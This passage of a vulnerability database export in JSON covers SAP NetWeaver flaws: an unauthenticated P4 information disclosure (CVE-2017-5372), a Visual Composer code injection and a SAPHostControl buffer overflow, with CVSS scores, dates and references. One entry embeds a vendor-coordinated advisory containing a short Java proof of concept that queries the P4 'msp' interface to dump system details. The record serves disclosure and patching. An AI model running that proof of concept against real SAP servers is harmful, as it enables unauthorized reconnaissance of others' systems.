"version": "7.31"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver as java",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.11"
}
],
"sources": [
{
"db": "BID",
"id": "93504"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001370"
},
{
"db": "NVD",
"id": "CVE-2017-5372"
},
{
"db": "CNNVD",
"id": "CNNVD-201701-750"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-5372"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vahagn Vardanyan (ERPScan)",
"sources": [
{
"db": "BID",
"id": "93504"
}
],
"trust": 0.3
},
"cve": "CVE-2017-5372",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-5372",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-5372",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-5372",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201701-750",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-001370"
},
{
"db": "NVD",
"id": "CVE-2017-5372"
},
{
"db": "CNNVD",
"id": "CNNVD-201701-750"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The function msp (aka MSPRuntimeInterface) in the P4 SERVERCORE component in SAP AS JAVA allows remote attackers to obtain sensitive system information by leveraging a missing authorization check for the (1) getInformation, (2) getParameters, (3) getServiceInfo, (4) getStatistic, or (5) getClientStatistic function, aka SAP Security Note 2331908. SAP Netweaver Application Server Java is prone to an authorization-bypass vulnerability. \nAttackers can exploit this issue to gain unauthorized access and obtain sensitive information or elevate privileges. This may aid in further attacks. Application: SAP NetWeaver AS JAVA\n\nVersions Affected: SAP NetWeaver AS JAVA 7.11-7.4\n\nVendor URL: http://SAP.com\n\nBugs: Information disclosure\n\nSent: 10.03.2016\n\nReported: 11.03.2016\n\nVendor response: 11.03.2016\n\nDate of Public Advisory: 12.10.2016\n\nReference: SAP Security Note 2331908\n\nAuthor: Vahagn @vah_13 Vardanyan (ERPScan)\n\n\n\nDescription\n\n1. ADVISORY INFORMATION\n\nTitle:[ERPSCAN-16-037] SAP NetWeaver AS JAVA P4 MSPRUNTIMEINTERFACE\nINFORMATION DISCLOSURE\n\nAdvisory ID:[ERPSCAN-16-037]\n\nRisk: high\n\nAdvisory URL:\nhttps://erpscan.com/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/\n\nDate published: 11.01.2017\n\nVendors contacted: SAP\n\n2. VULNERABILITY INFORMATION\n\nClass: Information disclosure\n\nImpact: broken authentication\n\nRemotely Exploitable: yes\n\nLocally Exploitable: no\n\nCVE: CVE-2017-5372\n\nCVSS Information\n\nCVSS Base Score v3: 7.3 / 10\n\nCVSS Base Vector:\n\nAV : Attack Vector (Related exploit range) Network (N)\n\nAC : Attack Complexity (Required attack complexity) Low (L)\n\nPR : Privileges Required (Level of privileges needed to exploit) None (N)\n\nUI : User Interaction (Required user participation) None (N)\n\nS : Scope (Change in scope due to impact caused to components beyond the\nvulnerable component) Unchanged (U)\n\nC : Impact to Confidentiality Low (L)\n\nI : Impact to Integrity Low (L)\n\nA : Impact to Availability Low (L)\n\n\n3. \n\n4. VULNERABLE PACKAGES\n\n\nSERVERCORE\n\n7.11\n7.20\n7.30\n7.31\n7.40\n7.50\n\n\n5. SOLUTIONS AND WORKAROUNDS\n\nTo correct this vulnerability, install SAP Security Note 2331908\n\n\n\n6. AUTHOR\n\n Vahagn Vardanyan (ERPScan)\n\n\n\n7. TECHNICAL DESCRIPTION\n\nSAP AS JAVA P4 function msp (MSPRuntimeInterface) does not require any\nauthorization to call the following functions:\n\n\ngetInformation\n\ngetParameters\n\ngetServiceInfo\n\ngetStatistic\n\ngetClientStatistic\n\nPoC (Java language)\n\n\npackage sap_p4_poc;\n\n*****\n\nProperties p = new Properties();\n\np.put(\"java.naming.factory.initial\",\n\"com.sap.engine.services.jndi.InitialContextFactoryImpl\");\n\np.put(\"java.naming.provider.url\", SAP_IP+\":\"+SAP_PORT);\n\nInitialContext initialContext = new InitialContext(p);\n\nContext initialContext = initialContext;\n\nMSPRuntimeInterface serialObj =\n(MSPRuntimeInterface)initialContext.lookup(\"msp\");\n\nSystem.out.println(\"----------------\" + serialObj +\n\"----------------------------------------\");\n\nSystem.out.println(\"----------------SID:\" + serialObj.getSystemId() +\n\"----------------------------------------\");\n\nSystem.out.println(\"----------------------getInformation:--------------------------------\");\n\nTreeMap Inf = serialObj.getInformation();\n\nprint_treee_map(Inf);\n\nSystem.out.println(\"----------------------getParameters:----------------------------------\");\n\nTreeMap Par = serialObj.getParameters();\n\nprint_treee_map(Par);\n\nSystem.out.println(\"-----------------------getServiceInfo:---------------------------------\");\n\nTreeMap Serv = serialObj.getServiceInfo();\n\nprint_treee_map(Serv);\n\nSystem.out.println(\"-----------------------getStatistic:---------------------------------\");\n\nTreeMap Stat = serialObj.getStatistic();\n\nprint_treee_map(Stat);\n\nSystem.out.println(\"-----------------------getClientStatistic:---------------------------------\");\n\nTreeMap Cli = serialObj.getClientStatistic();\n\nprint_treee_map(Cli);\n\n\n\n8. REPORT TIMELINE\n\nReported: 11.03.2016\n\nVendor response: 11.03.2016\n\nDate of Public Advisory: 12.10.2016\n\n\n9. REFERENCES\n\nhttps://erpscan.com/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/\n\n\n10. ABOUT ERPScan Research\n\nERPScan research team specializes in vulnerability research and analysis of\ncritical enterprise applications. It was acknowledged multiple times by the\nlargest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for\ndiscovering more than 400 vulnerabilities in their solutions (200 of them\njust in SAP!). \n\nERPScan researchers are proud of discovering new types of vulnerabilities\n(TOP 10 Web Hacking Techniques 2012) and of the \"The Best Server-Side Bug\"\nnomination at BlackHat 2013. \n\nERPScan experts participated as speakers, presenters, and trainers at 60+\nprime international security conferences in 25+ countries across the\ncontinents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for\nseveral Fortune 2000 companies. \n\nERPScan researchers carry out the EAS-SEC project that is focused on\nenterprise application security awareness by issuing annual SAP security\nresearches. \n\nERPScan experts were interviewed in specialized info-sec resources and\nfeatured in major media worldwide. Among them there are Reuters, Yahoo, SC\nMagazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc. \n\nOur team consists of highly-qualified researchers, specialized in various\nfields of cybersecurity (from web application to ICS/SCADA systems),\ngathering their experience to conduct the best SAP security research. \n\n11. ABOUT ERPScan\n\nERPScan is the most respected and credible Business Application\nCybersecurity provider. Founded in 2010, the company operates globally and\nenables large Oil and Gas, Financial, Retail and other organizations to\nsecure their mission-critical processes. Named as an aEmerging Vendora in\nSecurity by CRN, listed among aTOP 100 SAP Solution providersa and\ndistinguished by 30+ other awards, ERPScan is the leading SAP SE partner in\ndiscovering and resolving security vulnerabilities. ERPScan consultants\nwork with SAP SE in Walldorf to assist in improving the security of their\nlatest solutions. \n\nERPScanas primary mission is to close the gap between technical and\nbusiness security, and provide solutions for CISO\u0027s to evaluate and secure\nSAP and Oracle ERP systems and business-critical applications from both\ncyberattacks and internal fraud. As a rule, our clients are large\nenterprises, Fortune 2000 companies and MSPs, whose requirements are to\nactively monitor and manage security of vast SAP and Oracle landscapes on a\nglobal scale. \n\nWe afollow the suna and have two hubs, located in Palo Alto and Amsterdam,\nto provide threat intelligence services, continuous support and to operate\nlocal offices and partner network spanning 20+ countries around the globe. \n\n\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\n\nPhone: 650.798.5255\n\nTwitter: @erpscan\n\nScoop-it: Business Application Security\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-5372"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001370"
},
{
"db": "BID",
"id": "93504"
},
{
"db": "PACKETSTORM",
"id": "140611"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-5372",
"trust": 2.8
},
{
"db": "BID",
"id": "93504",
"trust": 1.9
},
{
"db": "PACKETSTORM",
"id": "140611",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001370",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201701-750",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "93504"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001370"
},
{
"db": "PACKETSTORM",
"id": "140611"
},
{
"db": "NVD",
"id": "CVE-2017-5372"
},
{
"db": "CNNVD",
"id": "CNNVD-201701-750"
}
]
},
"id": "VAR-201701-0793",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:29:26.276000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP NetWeaver Technology Community",
"trust": 0.8,
"url": "http://www.sap.com/community/topic/netweaver.html"
},
{
"title": "SAP AS JAVA P4 SERVERCORE Fixes for component security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67315"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-001370"
},
{
"db": "CNNVD",
"id": "CNNVD-201701-750"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-001370"
},
{
"db": "NVD",
"id": "CVE-2017-5372"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "https://erpscan.com/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/"
},
{
"trust": 1.6,
"url": "http://packetstormsecurity.com/files/140611/sap-netweaver-as-java-p4-mspruntimeinterface-information-disclosure.html"
},
{
"trust": 1.6,
"url": "http://seclists.org/fulldisclosure/2017/jan/50"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/93504"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/"
},
{
"trust": 0.9,
"url": "https://erpscan.com/press-center/blog/sap-cyber-threat-intelligence-report-october-2016/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5372"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-5372"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://www.onapsis.com/blog/switchable-authorization-checks-sap-security-notes-october-2016"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2331908"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-5372"
},
{
"trust": 0.1,
"url": "http://sap.com"
}
],
"sources": [
{
"db": "BID",
"id": "93504"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001370"
},
{
"db": "PACKETSTORM",
"id": "140611"
},
{
"db": "NVD",
"id": "CVE-2017-5372"
},
{
"db": "CNNVD",
"id": "CNNVD-201701-750"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "93504"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-001370"
},
{
"db": "PACKETSTORM",
"id": "140611"
},
{
"db": "NVD",
"id": "CVE-2017-5372"
},
{
"db": "CNNVD",
"id": "CNNVD-201701-750"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-10-11T00:00:00",
"db": "BID",
"id": "93504"
},
{
"date": "2017-02-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-001370"
},
{
"date": "2017-01-19T14:09:31",
"db": "PACKETSTORM",
"id": "140611"
},
{
"date": "2017-01-23T21:59:03.220000",
"db": "NVD",
"id": "CVE-2017-5372"
},
{
"date": "2017-01-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201701-750"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-01-23T02:11:00",
"db": "BID",
"id": "93504"
},
{
"date": "2017-02-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-001370"
},
{
"date": "2018-12-10T19:29:23.517000",
"db": "NVD",
"id": "CVE-2017-5372"
},
{
"date": "2017-02-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201701-750"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201701-750"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP AS JAVA of P4 SERVERCORE Component msp Vulnerabilities in which system information is obtained",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-001370"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201701-750"
}
],
"trust": 0.6
}
}
var-201708-1661
Vulnerability from variot
SAP NetWeaver Visual Composer is prone to a vulnerability that lets attackers inject and execute arbitrary code. Successful exploits may allow an attacker to inject and run arbitrary code or obtain sensitive information that may aid in further attacks. Failed exploit attempts may result in a denial-of-service condition.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201708-1661",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "visual composer",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.31"
},
{
"model": "visual composer",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "visual composer",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "visual composer",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "visual composer",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.00"
},
{
"model": "vcframework",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "vcframework",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "vcframework",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.00"
},
{
"model": "vc70runtime",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.50"
},
{
"model": "vc70runtime",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.40"
},
{
"model": "vc70runtime",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.31"
},
{
"model": "vc70runtime",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "100170"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "100170"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Visual Composer is prone to a vulnerability that lets attackers inject and execute arbitrary code.\nSuccessful exploits may allow an attacker to inject and run arbitrary code or obtain sensitive information that may aid in further attacks. Failed exploit attempts may result in a denial-of-service condition.",
"sources": [
{
"db": "BID",
"id": "100170"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "100170",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "100170"
}
]
},
"id": "VAR-201708-1661",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:08:57.651000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2376081"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2552318"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2018/04/10/sap-security-patch-day-april-2018/"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/08/08/sap-security-patch-day-august-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "100170"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "100170"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-08T00:00:00",
"db": "BID",
"id": "100170"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-04-11T09:00:00",
"db": "BID",
"id": "100170"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "100170"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Visual Composer Remote Code Injection Vulnerability",
"sources": [
{
"db": "BID",
"id": "100170"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "100170"
}
],
"trust": 0.3
}
}
var-201202-0362
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAPHostControl service has a boundary error when processing certain commands wrapped in SOAP messages. A stack-based buffer overflow can be triggered by a very long command, and a successful exploit can execute arbitrary code in the application context. SAP Netweaver is prone to a remote buffer-overflow vulnerability. Failed exploit attempts may result in a denial-of-service condition. SAP Netweaver 7.02 is affected; other versions may also be vulnerable. ----------------------------------------------------------------------
Secunia presentations @ RSA Conference 2012, San Francisco, USA, 27 Feb-02 March Listen to our Chief Security Specialist, Research Analyst Director, and Director Product Management & Quality Assurance discuss the industry's key topics. Also, visit the Secunia stand #817. Find out more: http://www.rsaconference.com/events/2012/usa/index.htm
TITLE: SAP NetWeaver SAPHostControl Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA48047
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/48047/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=48047
RELEASE DATE: 2012-02-20
DISCUSS ADVISORY: http://secunia.com/advisories/48047/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/48047/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=48047
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Context Information Security has reported a vulnerability in SAP NetWeaver, which can be exploited by malicious people to compromise a vulnerable system.
The vulnerability is reported in version 7.02.
SOLUTION: Apply SAP security note 1638811.
PROVIDED AND/OR DISCOVERED BY: Nico Leidecker, Context Information Security.
ORIGINAL ADVISORY: SAP: https://service.sap.com/sap/support/notes/1638811
Context Information Security: http://archives.neohapsis.com/archives/fulldisclosure/2012-02/0269.html
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
